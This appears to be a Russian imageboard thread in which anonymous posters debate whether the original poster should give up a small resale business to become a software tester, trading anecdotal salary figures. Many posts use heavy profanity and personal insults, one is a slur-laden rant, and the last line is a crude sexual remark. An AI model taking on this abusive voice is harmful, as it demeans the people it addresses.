За +50к мне нет смысла что-то менять. Это по сути мои премии. Рвать жопу 8+ часов в день, чтобы получить 500к в год? Ну это пиздец. Я лучше буду получать -50к зато чилить после четырех дня и катать на велике. |
|
|
|
>Сделай еще 2 миллиона, в чем твоя проблема? Ебать, это полгода работы. Надо машину разгрузить, если придется, риски и риски смузихлебы сидят дома за такие деньги |
|
Только ссаным тестировщиком ты первый год будешь получать 50к, потом может закатишься на 100-120к, до 200к ты будешь тележить тестером лет 5 |
|
Этого двачую. Заебал этот наебизнес блядь. Хочу разрабатывать на анусай и пить кофе. А не по руки в дерьме решать миллиард вопросов. Еще и физически приходится работать периодически |
|
|
|
При ЗП 70к, ты будешь 2 лимона зарабатывать 2.5 года. Сделай еще 2 миллиона, в чем твоя проблема? |
|
>ри ЗП 70к, ты будешь 2 лимона зарабатывать 2.5 года. За год можно прыгнуть на 150к |
|
2кк это готовая зарплата при 150к |
|
>2кк это готовая зарплата при 150к Нет, я как оп сейчас имею постоянную работу на барена за 120к. От нее у меня остается в среднем 50-60к в ДС Наебизнес начал в кредит, взял 300к в банке и купил товарки |
|
галку забыл снять, овощь ты ебанный |
|
>галку забыл снять, овощь ты ебанный Я специально поставил |
|
А было бы забавно после бамплимита видеть кто что писал |
|
|
|
>4 месяца знаю все Как же я рад, могу спать спокойно))))) Я тут сука каждые выходные что-то новое на досуге придумываю, узнаю, в шейдерах сука по пол дня сижу ковыряю, рендер пайплайны-хуяйны, постпроцессинг, vfx, а он за 4 месяца все знает о тестеровке и пытается на серьезных щах после курса без опыта идти на мидла. Ну и еблан. Мимо тех.арт 5+ лет опыта |
|
>Как же я рад, могу спать спокойно))))) Не можешь, ты себе мозг ебешь каждый день чем-то новым |
|
|
|
Либо про бизнес троллинг, либо оп хлебушек, нахуя ему айти при бизнесе? |
|
>либо оп хлебушек, нахуя ему айти при бизнесе? Бизнес это не постоянная хуйня, я закупил вагон дилдаков, продал вагон дилдаков Где гарантия, что еще дилдаки будут нужны? |
|
|
|
Пиздец какой же жирный тред, но долбоебы выведут его в бамплимит. |
|
>акой же жирный тред В чем жир? |
|
|
|
зачем тебе РАБотать при бизнесе, пиздаболка? |
|
Так наебизнес это, это не стабильная хуйня. Разово поднял |
|
|
|
Ты блять уёбище буржуйское пиндосское либераст, иди на нормальную работу лох конченый, от твоего айти обществу и Отечесту пользы 0%. Иди на завод, или в сельское хозяйство, нечего тут хуйнёй страдать, еблан, в айти работать западло, ни один нормальный чел не будет тыкать кнопки на компьютере за 100500 тыщ рублей, Креатив Говно, Автор Мудак. |
|
|
|
Может ментора взять сеньора тестера? |
|
|
|
какое же искривление пространства вокруг её жопы |
|
|